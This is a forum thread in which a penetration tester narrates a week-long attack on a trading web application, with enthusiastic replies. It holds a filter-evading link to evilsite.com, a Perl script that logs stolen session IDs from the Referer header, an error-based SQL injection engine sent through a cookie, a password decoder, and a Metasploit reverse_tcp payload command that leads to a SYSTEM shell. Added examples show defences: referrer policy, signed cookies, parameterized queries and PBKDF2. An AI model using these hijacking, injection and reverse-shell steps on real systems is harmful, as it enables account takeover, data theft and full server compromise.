XSS to Root



fb1h2s
09-27-2010, 12:48 AM
Last week I was assigned a WPT, where I had to check a web application.
Normally in WPTs you will find a lot of bugs if you spend some good time analyzing the application in and out. And tools like WebInspect and AppScan are also of good help to one extent.

But the application I was testing had some sort of filter which prevented the possibilities of any sort of normal web application attacks, and redirected all malicious requests to one common error page. And all tools were giving out too many false positives. And I was almost going mad.

It was a module where users could trade objects. And three types of users were there: Anonymous Users, Manager Users and, as always, a super user. Anyone could access the anonymous user, as the username and password were open for all; after logging in as Anonymous you could trade your things with other users, provided the managers accepted it, as all your submissions went via the manager users.

The application didn't use any cookies; instead it used a session ID, which was passed in on every request via the [GET] method:


http://site.com/usrpage/?userid={D8A349A7-3503-4283-A1AA-9406DB6EE9C5}


So what struck me was that the user session ID held the authentication, and if I could get hold of another valid session I could be in that user's privileges. And the only possible way is by tracking the HTTP_REFERER value. And this could only be possible by making the administrator/manager click one of our links from the application. And then we could hijack the user session. For those who are not aware of what I am talking about, read a similar scenario:
http://fb1h2s.com/view.php?article_id=8

In order to achieve that, I needed to find an XSS in the section where I could post my data for the manager approval, or, if I managed to send a hyperlink which when clicked "boomed", my back end program would store the session IDs.
But with the current filter which was blocking all unwanted requests it was hardly possible.

And I was all stuck at this part. I even tried out all the XSS bypass stuff in http://ha.ckers.org/xss.html and none worked for me, and at that time Vinay "vinnu" bro was online and was all ready for help :). I presented my scenario of the filter and that I wanted to bypass it; he gave me a few cool tips, in which converting the payload string that was a hyperlink

<link href="http://evilsite.com/evilscript.py" />
bypassed the filter when half the string was hex encoded and the other half was double hexed :).

So now the first phase was done and I had almost wasted one day :( .

Day 2 :

Now I knew that I could send the managers a hyperlink and trick them into clicking the link, stating that it was some wonderful product review. But the problem was that I didn't know when the manager users would log in and administrate my stuff, and the sessions would remain valid only till the user clicked Logout. And I wouldn't be able to stay online 24/7 waiting for the manager to come online.
Even though I stay online 3/4 of my time, I needed a better plan.

So I thought of writing an SMS alert application, which would send an SMS to my phone whenever the click was initiated :D. So I could come online immediately and use the sessions. I chose 160by2.com for this and planned to automate it via Perl CGI.
Why Perl? Because Apache was by default configured to handle Perl CGI, and the Mechanize module in Perl is amazing.


While analyzing 160by2.com for automating the request I found an SQL injection in one of the POST methods and started playing around with it and wasted a few hours. And by night the code was all ready and I sent the hyperlink to the victims with a convincing text.



#!c:/perl/bin/perl.exe
#CGI perl woot woot by fb1h2s
use CGI;
use strict;
use WWW::Mechanize;
use HTTP::Cookies;
#lets save session first (the referer carries the caller's session URL)
open (MYFILE, '>>session.txt') or die "cannot open session.txt: $!";
print MYFILE "\t$ENV{HTTP_REFERER}\n\n";
print MYFILE "\t$ENV{HTTP_USER_AGENT}\n\n";
print MYFILE "\t$ENV{HTTP_ACCEPT}\n\n";
print MYFILE "\t$ENV{REMOTE_ADDR}\n\n";
close (MYFILE);
#inform the master via sms now
my $url = "http://160by2.com/";
my $mobileno = "mymobno"; #usernameno
my $password = "mypass"; #password
my $mobilewoot ="smstothisno"; #no to recive alert
my $woot_woot = " woot woot"; #msg text
my $mech = WWW::Mechanize->new();
$mech->cookie_jar(HTTP::Cookies->new());
$mech->get($url);
#my $output_page = $mech->content();
#print "$output_page";
$mech->form_id('login_form');
$mech->field(htxt_UserName => $mobileno);
$mech->field(txt_Passwd => $password);
$mech->click();
$mech->get("http://www.160by2.com/compose_sms.aspx");
$mech->form_id('frmcompose');
$mech->field(txt_msg => $woot_woot);
$mech->field(txt_mobileno => $mobilewoot);
#//"figure the rest out "
$mech->click();
#my $output_page1 = $mech->content();
#print "$output_page1";
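
The whole hijack above works because the session identifier rides in the query string, so any link the manager follows carries it out in the Referer header. The following is an added example (not code from the original post) that models how a browser computes the Referer under each value of the Referrer-Policy header, shows the leak for a session-in-URL design, and builds the cookie-based alternative that never appears in a Referer at all. The page URL, the GUID, the external link and the cookie name are constructed values; browser defaults at the time of the post behaved like no-referrer-when-downgrade, current browsers default to strict-origin-when-cross-origin.

```python
from urllib.parse import urlsplit, urlunsplit, parse_qs

# Constructed sample values (not from the original post). The GUID is made up;
# the vulnerable pattern is the session token living in the query string.
APP_PAGE = "http://site.com/usrpage/?userid={00000000-0000-4000-8000-000000000000}"
EXTERNAL_LINK = "http://external.example/product-review"


def _origin(url):
    p = urlsplit(url)
    return f"{p.scheme}://{p.netloc}/"


def _stripped(url):
    # A Referer never carries the fragment or userinfo, but it keeps the query string.
    p = urlsplit(url)
    host = p.hostname or ""
    if p.port:
        host = f"{host}:{p.port}"
    return urlunsplit((p.scheme, host, p.path, p.query, ""))


def _is_downgrade(src, dst):
    return urlsplit(src).scheme == "https" and urlsplit(dst).scheme == "http"


def referer_for(page_url, target_url, policy="no-referrer-when-downgrade"):
    """Simplified Referrer Policy computation: the Referer a browser attaches
    when a user on page_url follows a link to target_url under the given policy."""
    same_origin = _origin(page_url) == _origin(target_url)
    downgrade = _is_downgrade(page_url, target_url)
    full, origin = _stripped(page_url), _origin(page_url)
    if policy == "no-referrer":
        return None
    if policy == "unsafe-url":
        return full
    if policy == "no-referrer-when-downgrade":
        return None if downgrade else full
    if policy == "origin":
        return origin
    if policy == "same-origin":
        return full if same_origin else None
    if policy == "origin-when-cross-origin":
        return full if same_origin else origin
    if policy == "strict-origin":
        return None if downgrade else origin
    if policy == "strict-origin-when-cross-origin":
        if same_origin:
            return full
        return None if downgrade else origin
    raise ValueError(f"unknown policy: {policy}")


def leaked_session(referer, param="userid"):
    """Return the session token an external site would receive in this Referer, or None."""
    if not referer:
        return None
    values = parse_qs(urlsplit(referer).query).get(param)
    return values[0] if values else None


def session_cookie_header(token, name="sid"):
    """Hardened alternative: carry the session in a cookie. Cookies are not part of
    the URL, so no Referrer-Policy mistake can leak them; HttpOnly keeps script away
    from it, Secure keeps it off plaintext links, SameSite=Lax limits cross-site sends."""
    return f"{name}={token}; Path=/; HttpOnly; Secure; SameSite=Lax"


if __name__ == "__main__":
    for policy in ("no-referrer-when-downgrade", "strict-origin-when-cross-origin", "no-referrer"):
        ref = referer_for(APP_PAGE, EXTERNAL_LINK, policy)
        print(f"{policy:34} Referer={ref!r:60} leaked={leaked_session(ref)}")
    print(session_cookie_header("opaque-random-token"))
```

Even with a strict Referrer-Policy, moving the identifier out of the URL is the real fix: a policy header only governs what browsers honouring it send, while a URL-borne token also ends up in proxy logs, browser history and bookmarks.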

fb1h2s
09-27-2010, 12:49 AM
Day 3:

By the next day evening, around dinner time, I got my "woot woot" SMS from my program confirming the click and I just hurried online and gained a manager session :). Now it was again disappointing; there were options to manage the transactions, approve and deny stuff, but nothing good to proceed further was found. All manager pages were filtered too for any SQL injection and other stuff, so I reached another dead end. By the way, I didn't forget to update the account's email ID with mine and the secret question and answer so that I could get inside again.

Day 4:
I reset the manager password and gained access to the manager interface, and kept analyzing each and every field of the application, and by noon I noticed
that a few state cookies were saved, which were used to confirm that no manipulation of data was done, some sort of security feature. I used my favourite add-on Tamper Data to manipulate that request and altered it with an SQL injection check. Yepiiiiiii, there I got an SQL bug finally in some session cookies huhhhh. I dumped a few usernames and passwords; the passwords didn't have the look of a password though, they were sort of jumbled up, but I didn't hesitate to try them out, but none worked. So I thought of dumping the whole database and trying them out, but the problem was that it was on the session cookies and I wasn't aware of any tools which would satisfy my needs. And I went around asking people whether they were aware of any such tools, and was disappointed, so I thought of writing one, as it would be impossible to dump the entire data manually.

What I did was grab a copy of rasuron's darkmssql.py, which supported the GET method and union based injection, and modified it to support POST requests + error based injection.


from httplib import HTTPConnection
from urllib import urlencode
import re

# url (target host) and file (debug log handle) are set elsewhere in the full script, which is not posted here
def GetTheShit(head_URL):
    try:
        #print "\nam here",head_URL
        file.write("\n[debug] "+head_URL)
        connection = HTTPConnection(url)
        # the injected value travels in the state cookie, as described above
        head = {"Content-Type" : "application/x-www-form-urlencoded", "Accept" : "text/plain" ,"Referer" :"http://manycloe.com","Cookie":"State_date="+head_URL}
        parameters = urlencode({"fileds_value" : "sas", "fileds_value" : "sas","cmdSubmit" : "Submit"})
        connection.request("POST", "/GetPW.asp", parameters, head)
        r2 = connection.getresponse()
        source = r2.read()
        #print source
        # pull the value echoed back inside the database error message
        match = re.findall("value '[\d\D]*' to",source)
        match = match[0][7:-4]
        print
        return match
    except (KeyboardInterrupt, SystemExit):
        raise
    except:
        pass


GetTheShit was darkmssql's HTTP connection engine, and I am not going to put up the entire code.
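
The state cookie in Day 4 was meant to prove the client had not tampered with data, yet its value went straight into a query. The example below is added here and is not code from the original post or from darkmssql: it shows what that cookie should have looked like (an HMAC tag so that any edit made with a tool like Tamper Data is rejected before the value is used) and, as a second layer, a parameterized lookup beside the string-concatenated one, so that even a value that does reach the database is treated as data. The secret key, the SQLite table and the user names are constructed; the unsafe lookup is included only to show the error-based behaviour the post describes.

```python
import base64
import hashlib
import hmac
import json
import sqlite3

# Constructed server-side secret (assumption: never sent to the client, rotated on schedule).
STATE_KEY = b"server-side-secret-rotate-me"


def sign_state(state, key=STATE_KEY):
    """Serialise a state dict into a cookie value: base64(json) '.' hex(HMAC-SHA256)."""
    body = base64.urlsafe_b64encode(json.dumps(state, sort_keys=True).encode()).decode()
    tag = hmac.new(key, body.encode(), hashlib.sha256).hexdigest()
    return f"{body}.{tag}"


def verify_state(cookie, key=STATE_KEY):
    """Return the state dict if the tag matches, else None. Constant-time compare
    so the check itself does not leak how many tag bytes were right."""
    try:
        body, tag = cookie.rsplit(".", 1)
    except ValueError:
        return None
    expected = hmac.new(key, body.encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(expected, tag):
        return None
    try:
        return json.loads(base64.urlsafe_b64decode(body.encode()))
    except (ValueError, UnicodeDecodeError):
        return None


def make_db():
    """Constructed in-memory table standing in for the target's user store."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, pw TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", [("alice", "h1"), ("bob", "h2")])
    return conn


def lookup_unsafe(conn, name):
    # The pattern the post describes: cookie data concatenated into SQL text.
    # A stray quote produces a database error, which is the error-based signal.
    return conn.execute(f"SELECT name FROM users WHERE name = '{name}'").fetchall()


def lookup_safe(conn, name):
    # Parameterized: the driver binds the value, it is never parsed as SQL.
    return conn.execute("SELECT name FROM users WHERE name = ?", (name,)).fetchall()


def handle_request(conn, cookie):
    """Defensive request path: integrity check first, parameterized query second."""
    state = verify_state(cookie)
    if state is None:
        return ("rejected", None)
    return ("ok", lookup_safe(conn, state.get("user", "")))


if __name__ == "__main__":
    conn = make_db()
    good = sign_state({"user": "alice"})
    print("valid cookie   ->", handle_request(conn, good))
    tampered = good[: good.index(".")] + "x" + good[good.index("."):]
    print("tampered cookie->", handle_request(conn, tampered))
    try:
        lookup_unsafe(conn, "'")
    except sqlite3.OperationalError as exc:
        print("unsafe lookup with a quote raises:", exc)
```

The two layers are independent: the HMAC stops the state cookie from being used as an input channel at all, and parameterization protects the query if some other field reaches it. Neither depends on a request filter recognising attack strings, which is the defence the post's target relied on and which the author got past.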

fb1h2s
09-27-2010, 12:49 AM
Day 5:

The code successfully dumped all users and passwords.
A sample output is given here:


hsklyu†‰†
qez}„…zJN
neuktu…GKO
"not real ones"


It was some kind of custom built encryption; there was no way I could do anything unless and until I found the algorithm. And the only possible way to figure that out was the Change Password option. So I reset my current password with a few test values and obtained these results:


1234 == 26:>
aaaa == behk

Whuhuuu, it was just another stupid algorithm,
String =String[i+3] was the logic :D


Security via Ob-security

Made another quick script which decrypted all the passwords, and later added this POC code to the report.



#python 2.5
#POC Program to decode the encrypted password
#
print "[+]Weak encryption POC by "
encrypted= raw_input("[+]Enter Encrypted Password:")
password =[]
length =len (encrypted)
init =1
# character i was shifted by 1 + 3*i, so undo the shift position by position
for i in range(0,length):
    temp=ord(encrypted[i])
    f =chr(temp-init)
    init = init + 3
    password.append(f)
print "Decoded password:"
print "".join(password)


Day 6:

And the password cracking led me to the Super Admin account :D, and there was a file upload utility which let me upload anything. I simply uploaded a simple ASP.NET command shell, as other web shells were detected and deleted by the anti virus of that server. And then I made an MSF reverse_tcp and a Meterpreter reverse executable using Metasploit:



./msfpayload windows/shell/reverse_tcp LHOST=myhost LPORT=31337 X > c:\\sas.exe
Uploaded it to the server and called it via the command shell, and made an MSF multi handler listen for the connection.

> use multi handler



http://fb1h2s.com/woot_woot.JPG

And there I had a session with NT Authority privileges :D. A shell is just a beginning, but my scope of work ended there.

I was damn happy after my tiresome chase after this application. Felt really great, maybe because it took a week to reach the goal.
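
The Day 5 scheme and its consequence (every stored password recoverable without any key) are the reason password storage uses a salted, slow, one-way hash instead of a reversible transform. The following is an added example, not code from the original post: it reproduces the observed scheme from the two test pairs in the post (each character shifted by 1, 4, 7, ... in turn), shows it is trivially invertible, and puts a PBKDF2-HMAC-SHA256 store-and-verify pair beside it, where nothing stored can be turned back into the password. Iteration count, salt length and the storage format are my choices, not anything from the page.

```python
import hashlib
import hmac
import os


def weak_encode(password):
    """The scheme observed in the post: character i is shifted by 1 + 3*i.
    Derived only from the pairs '1234' -> '26:>' and 'aaaa' -> 'behk'."""
    return "".join(chr(ord(c) + 1 + 3 * i) for i, c in enumerate(password))


def weak_decode(encoded):
    """Exact inverse: no key is involved, so anyone holding the table gets every password."""
    return "".join(chr(ord(c) - 1 - 3 * i) for i, c in enumerate(encoded))


def hash_password(password, salt=None, iterations=600_000):
    """Store salt, iteration count and the derived key; the password itself is never kept.
    A fresh 16-byte salt per user means equal passwords do not produce equal records."""
    salt = os.urandom(16) if salt is None else salt
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${dk.hex()}"


def verify_password(password, stored):
    """Recompute with the stored salt and iteration count; constant-time compare of the result."""
    try:
        algo, iters, salt_hex, dk_hex = stored.split("$")
    except ValueError:
        return False
    if algo != "pbkdf2_sha256":
        return False
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), bytes.fromhex(salt_hex), int(iters))
    return hmac.compare_digest(dk.hex(), dk_hex)


if __name__ == "__main__":
    # Constructed sample password; the two pairs below are the ones from the post.
    for sample in ("1234", "aaaa"):
        print(f"{sample} == {weak_encode(sample)}  (decodes back to {weak_decode(weak_encode(sample))})")
    record = hash_password("s3cr3t!", iterations=50_000)
    print("stored:", record)
    print("verify correct:", verify_password("s3cr3t!", record))
    print("verify wrong:  ", verify_password("s3cr3t?", record))
```

The contrast worth keeping in mind for a report: with the shift scheme, one change-password experiment (exactly what the post did) exposes the whole table; with the PBKDF2 record, an attacker who dumps the table still has to guess each password and pay the iteration cost per guess per user.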

b0nd
09-27-2010, 09:47 AM
Mind blowing!!! Hats off to you fb1!!! That's a real hackerish attempt to achieve the goal.
Keep it up buddy!

"vinnu"
09-27-2010, 10:08 AM
It is not the number of days, which may go endless, rather the "atlast" fruit, that matters. And in this case, you have achieved what fills the heart of a hacker with bliss.

Keep on man. This world needs more out of your best... "vinnu"

steve_ron
09-27-2010, 10:13 AM
Good Show, all the best for the future ones :)

prashant_uniyal
09-27-2010, 11:10 AM
Superb!!!! fb1h2s rockssSSss!!!! ;) :)

abhaythehero
09-28-2010, 02:25 AM
brilliant !!
:)
thanks for making this detailed description.

41.w4r10r
09-28-2010, 02:24 PM
As always fb1 rocked..............

I like one thing very much and that is when you say "Woot Woot"...........

AnArKI
09-28-2010, 07:21 PM
Thts an awesome piece of work......

the_empty
09-29-2010, 06:56 PM
that was cruel....
has the developer of that application committed suicide yet... or is he waiting for you to do that honor as well

sh0bhit
09-29-2010, 08:18 PM
amazing...................use of brain

that's_all
10-09-2010, 09:52 PM
You rock!
Cheers!

d4rkd4wn
10-12-2010, 02:20 PM
Awesome........................................... .....

ph0b0s
10-29-2010, 03:18 AM
great hack man...
The best thing which I liked in your post is your script to SMS you back!!
This thing rocked!!

abhaythehero
12-23-2010, 08:32 PM
In order to achieve that, I needed to find an XSS in the section where I could post my data for the manager approval, or, if I managed to send a hyperlink which when clicked "boomed", my back end program would store the session IDs.
But with the current filter which was blocking all unwanted requests it was hardly possible.

And I was all stuck at this part. I even tried out all the XSS bypass stuff in http://ha.ckers.org/xss.html and none worked for me, and at that time Vinay "vinnu" bro was online and was all ready for help. I presented my scenario of the filter and that I wanted to bypass it; he gave me a few cool tips, in which converting the payload string that was a hyperlink
Code:

<link href="http://evilsite.com/evilscript.py" />

bypassed the filter when half the string was hex encoded and the other half was double hexed.

Well, I was watching a video of a talk given by Joe McCray
at DEF CON 18. And he kind of described the exact situation
fb1h2s is talking about in these lines.

So i ripped that small part from the video and uploaded it >>

http://www.youtube.com/watch?v=S8xWnRTjRX8

Guess it would be helpful to anybody reading this.

@fb1h2s
bro, if possible, also please do elaborate that URL encoding stuff.

Once again both you and "vinnu" bro did excellent work !! :)

prashant_uniyal
12-23-2010, 10:09 PM
Thanks for the share abhay bro.. going in depth is also good to gain good knowledge on the topic :)

[s]
12-24-2010, 06:36 PM
nice research brother ;d

ajaysinghnegi
12-24-2010, 08:20 PM
Awesome Job bro..... very inspiring, keep up the Great work :D

SudoRooter
01-28-2011, 06:30 PM
Great man!!
Do not give up is the matter..

And now I learned a little bit more about the power of XSS.. =)

rs3873
03-02-2011, 08:02 PM
AWESOME fb1

Snypter
05-15-2011, 12:49 AM
too good yaar !

keval_domadia
05-25-2011, 04:23 AM
You are one nasty big monster.... (yea, that was a compliment)

Huskygold
12-01-2012, 01:26 AM
Man, your best post!! This is very interesting!